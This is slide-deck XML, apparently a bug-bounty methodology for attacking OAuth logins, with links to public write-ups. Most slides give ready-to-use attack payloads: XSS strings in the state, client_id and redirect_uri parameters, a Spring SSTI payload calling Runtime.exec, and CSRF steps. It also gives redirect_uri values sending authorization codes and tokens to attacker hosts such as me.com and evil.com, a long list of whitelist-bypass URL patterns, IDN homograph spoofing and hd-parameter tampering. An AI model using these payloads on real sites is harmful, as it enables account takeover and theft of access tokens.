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Lato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Arial Black"/>
      <p:regular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slide" Target="slides/slide44.xml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59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8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3bc9131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3bc9131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c15fce0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c15fce0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8b4dab6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38b4dab6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38b4dab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38b4dab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38b4dab6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38b4dab6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38b4dab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38b4dab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38b4dab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38b4dab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5e9193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5e9193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38b4dab6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38b4dab6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38b4dab6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38b4dab6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38b4da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38b4da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1d74457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1d74457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41d743fa9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41d743fa9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812d6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812d6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41d743fa9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41d743fa9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38b4dab6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38b4dab6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5e9193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5e9193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38b4dab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38b4dab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38b4dab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38b4dab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b5e91939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b5e9193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1d74457f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1d74457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e29076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e29076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308040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308040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42110c8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42110c8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8b4dab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8b4dab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2b9108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2b9108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b5e9193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b5e9193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d801c5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d801c5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8b4dab6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8b4dab6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b5e91939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ab5e91939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1d743fa9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1d743fa9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41d743fa9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541d743fa9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38b4dab6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38b4dab6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b5e9193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b5e9193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38b4dab6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e38b4dab6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ab5e9193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ab5e9193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c15fce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c15fce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2110c81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2110c81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41d743f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41d743f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38b4dab6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38b4dab6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38b4dab6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38b4dab6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38b4dab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38b4dab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38b4dab6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38b4dab6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c15fce0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c15fce0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medium.com/@logicbomb_1/bugbounty-user-account-takeover-i-just-need-your-email-id-to-login-into-your-shopping-portal-7fd4fdd6dd56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85002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medium.com/@nahoragg/chaining-tricky-oauth-exploitation-to-stored-xss-b67eaea4aabd" TargetMode="External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owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso.pdf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hyperlink" Target="https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/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youtube.com/watch?v=X0mV9HXbKHY" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/215381" TargetMode="External"/><Relationship Id="rId10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31163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blog.usejournal.com/reflected-xss-in-zomato-f892d6887147" TargetMode="External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ww.gosecure.net/blog/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/" TargetMode="External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://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth14.html" TargetMode="External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ysamm.com/?p=695" TargetMode="External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31747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twitter.com/intigriti/status/1173566272468135939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owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso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blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html" TargetMode="External"/><Relationship Id="rId7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97260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://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html" TargetMode="External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s://twitter.com/s0md3v/status/1354733673069694978" TargetMode="External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2559" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ysamm.com/?p=697" TargetMode="External"/><Relationship Id="rId7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twitter.com/intigriti/status/1265247965037428741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s://deepsec.net/docs/Slides/2016/Go_Hack_Yourself..._Frans_Rosen.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/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i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/kunalp94/status/1195321932612169728" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elmahdi.tistory.com/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86194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twitter.com/intigriti/status/1253676624488398850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hyperlink" Target="https://twitter.com/samwcyo/status/1246997498981494784" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=f1XCvDCO22U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JesseClarkND/abnormalizer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twitter.com/m4ll0k/status/1319783718249238535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twitter.com/intigriti/status/1383397368691789825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hyperlink" Target="https://twitter.com/intigriti/status/1185160357872066561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hyperlink" Target="https://twitter.com/ElMrhassel/status/1282661956676182017" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://blog.teddykatz.com/2019/11/05/github-oauth-bypass.html" TargetMode="External"/><Relationship Id="rId5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202781" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ysamm.com/?p=646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ysamm.com/?p=654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hyperlink" Target="https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=X0mV9HXbKHY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blog.rakeshmane.com/2016/09/bug-bounty-account-takeover.html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medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/" TargetMode="External"/><Relationship Id="rId10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55140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PortSwigger/turbo-intruder" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/nuclei" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.projectdiscovery.io/exploiting-race-conditons/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hackerone.com/reports/55140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5676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hyperlink" Target="https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso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blog.intothesymmetry.com/2014/02/oauth-2-attacks-and-bug-bounties.html" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso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blog.intothesymmetry.com/2015/10/on-oauth-token-hijacks-for-fun-and.html" TargetMode="External"/><Relationship Id="rId7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46485" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/oauth-misconfiguration-leads-to-full-account-takeover-22b032cb6732?source=---------1----------------------------" TargetMode="External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s://twitter.com/intigriti/status/1158383750490800128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akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3?source=---------0----------------------------" TargetMode="External"/><Relationship Id="rId5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X0mV9HXbKHY" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.amolbaikar.com/facebook-oauth-framework-vulnerability/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hackerone.com/reports/821896" TargetMode="External"/><Relationship Id="rId7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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1269266750467649538" TargetMode="External"/><Relationship Id="rId5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ankitthku.medium.com/account-takeover-via-common-misconfiguration-in-facebook-login-a2ac8b479b3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hyperlink" Target="https://hackerone.com/reports/314808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hackerone.com/reports/10197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31747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security.lauritz-holtmann.de/advisories/tiktok-account-takeover/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www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/202781" TargetMode="External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blackhat.com/docs/us-14/materials/us-14-Hu-How-To-Leak-A100-Million-Node-Social-Graph-In-Just-One-Week.pdf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ysamm.com/?p=684" TargetMode="External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hitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/" TargetMode="External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OAuth</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="72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Sign Up AND Log In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5167350" y="2141575"/>
            <a:ext cx="2751600" cy="505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         Sing Up With Google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5167350" y="2795225"/>
            <a:ext cx="2751600" cy="505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         Log In With Apple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6200" y="2239950"/>
            <a:ext cx="483250" cy="3087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0950" y="2822575"/>
            <a:ext cx="613750" cy="4508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4" name="Google Shape;324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,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Recall Id In Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change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This Id To Id Of Logged In Account </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Takeover This Account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firstname=I&amp;lastname=am&amp;image=URL&amp;anti_csrf=CSRF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&amp;id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Id-Of-Another-Account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;access_token=******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6" name="Google Shape;336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, Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add JSON OR XML Extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To OAuth Endpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. oauth/connect.json , Maybe Token Expose In Response !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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect.json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t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ype=token&amp;client_id=ID&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anti-csrf=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;redirect_uri=URL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Try To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Remove The State Parameter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From The beginning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?type=code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&amp;client_id=ID&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>state=Random&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redirect_uri=https://www.company.com&amp;scope=read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0" name="Google Shape;360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If </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There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Isn't State Parameter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There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Isn't Validation On State Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Create CSRF POC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type=code&amp;client_id=ID&amp;state=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random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redirect_uri=URL&amp;scope=read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6" name="Google Shape;36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In OAuth Connect Request Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert XSS Payloads If There Isn't Validation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On State Parameter e.g. )%7D(alert)(location);%7B%3C!--&amp;state=\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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)%7D(alert)(location);%7B%3C!--&amp;state=\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redirect_uri=URL&amp;scope=read&amp;type=code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&amp;client_id=ID&amp;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2" name="Google Shape;392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XSS Payloads e.g. &lt;marquee loop=1 width=0 onfinish=pr\u006fmpt(document.domain)&gt;XSS&lt;/marquee&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Cause Errors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client_id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;marquee loop=1 width=0 onfinish=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pr\u006fmpt(document.domain)&gt;&lt;/marquee&gt;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https://me.com/path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Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert SSTI Payloads In Scope Parameter e.g. ${T(java.lang.Runtime).getRuntime().exec("calc.exe")} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get 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type=code&amp;client_id=ID&amp;state=Random&amp;redirect_uri=URL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&amp;scope=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${T(Java.lang.Runtime).getRuntime().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exec("calc.exe")}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4" name="Google Shape;414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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> As Value Of Redirect URL e.g. data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To GET DOM-Based XSS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&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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6" name="Google Shape;426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28" name="Google Shape;428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XSS Payloads javascript:fetch(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'XSS'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Redirect URL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Parameter To Get XSS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29" name="Google Shape;4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client_id=ID&amp;client_secret=SECRET&amp;type=Authorization&amp;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code=Auth_code&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:fetch(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'XSS'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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40" name="Google Shape;440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XSS Payloads javascript:prompt(document.domain) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>While Trying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Log In With OAuth Provider If There Is URL Parameter Except Redirect URL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41" name="Google Shape;4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client_id=ID&amp;client_secret=SECRET&amp;type=Authorization&amp;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code=Auth_code&amp;redirect_uri=https://www.company.com/&amp;baseURL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:prompt(document.domain)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443" name="Google Shape;4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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force On The Login endpoint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Guess The Pattern e.g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login/facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Legacy OR Unimplemented OAuth Flows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0" name="Google Shape;450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Redirect The Server To Your Domain e.g. https://me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Steal The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization Code OR The Access Token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53" name="Google Shape;4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&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com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55" name="Google Shape;455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6" name="Google Shape;45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8" name="Google Shape;458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4" name="Google Shape;464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Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert Invalid Value</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Scope Parameter e.g. ggg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then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Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL To Your Domain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Open Redirection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type=code&amp;client_id=ID&amp;state=Random&amp;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redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;scope=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ggg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469" name="Google Shape;46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6" name="Google Shape;476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8" name="Google Shape;478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localhost As Value Of Redirect URL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameter To Steal The Authorization Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR The Access Token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79" name="Google Shape;4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&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://localhost.com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2" name="Google Shape;48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8" name="Google Shape;488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0" name="Google Shape;490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http://www.company.com_me.com As Value Of Redirect URL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Parameter To Steal The Authorization Code OR The Access Token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91" name="Google Shape;4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&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.company.com_me.com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93" name="Google Shape;493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4" name="Google Shape;49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0" name="Google Shape;500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2" name="Google Shape;502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Redirect URL Parameter To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirect URL As Value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Steal The Authorization Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR The Access Token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03" name="Google Shape;5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&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.company.com.com/../../</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redirect_uri=https://me.com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r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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505" name="Google Shape;50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7" name="Google Shape;507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8" name="Google Shape;508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4" name="Google Shape;514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6" name="Google Shape;516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https://apiAcompany.com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https://api.companyAcom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https://api.company.communication As Value Of Redirect URL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7" name="Google Shape;51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9" name="Google Shape;51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Patterns To Bypass The Whitelist In Redirect URL Parameter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8" name="Google Shape;52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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="20390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0" name="Google Shape;53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0" y="2093400"/>
            <a:ext cx="510550" cy="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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="2458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3" name="Google Shape;533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625" y="2925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5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5" name="Google Shape;535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313" y="332553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5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https://me.com\@www.company.com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https://company.com\@me.com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https://me.com/.www.company.com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https://company.com/ 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https://me.com\[company.com]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me.com%ff@company.com%2F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me.com%bf:@company.com%2F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me.com%252f@company.com%2F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//me.com%0a%2523.company.com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me.com://company.com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androideeplink://me.com\@company.com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androideeplink://a@company.com:@me.com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androideeplink://company.com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https://company.com.me.com\@company.com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company.com%252f@me.com%2fpath%2f%3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//me.com:%252525252f@company.com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company.com.evil.com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evil.com#company.com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evil.com?company.com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/%09/me.com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me.com%09company.com</a:t>
            </a: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/\me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="950">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="537" name="Google Shape;537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000" y="2472438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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="3664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9" name="Google Shape;539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725" y="37318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5" name="Google Shape;545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7" name="Google Shape;547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Use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IDN Homograph Attack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Spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirect URL Parameter To Steal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The Authorization Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR The Access Token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48" name="Google Shape;5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type=code&amp;client_id=ID&amp;state=Random&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://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www.cṍmpany.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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550" name="Google Shape;5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59" name="Google Shape;559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https://me.comğ.company.com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https://me.com\udfff@company.com As Value Of Redirect URL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0" name="Google Shape;5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2" name="Google Shape;56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5" name="Google Shape;56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7" name="Google Shape;567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3" name="Google Shape;573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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="36969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company.com " Name Of Company To Abnormlize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5" name="Google Shape;575;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="41043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| tee -a out.txt " Save Output To File out.txt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6" name="Google Shape;576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7" name="Google Shape;577;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="30334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abnormalizer.py company.com | tee -a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78" name="Google Shape;578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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Use Tools e.g.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abnormalizer.py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To Make List Of Payloads To Use In IDN Homograph Attack</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="579" name="Google Shape;57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With Google , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify hd Parameter From company.com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gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Be Able To Connect With Your Email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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response_type=code&amp;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                           client_id=ID&amp;scope=openid%20email&amp;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                           redirect_uri=https://company.com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&amp;nonce=Randim&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hd=gmail.com</a:t>
            </a:r>
            <a:r>
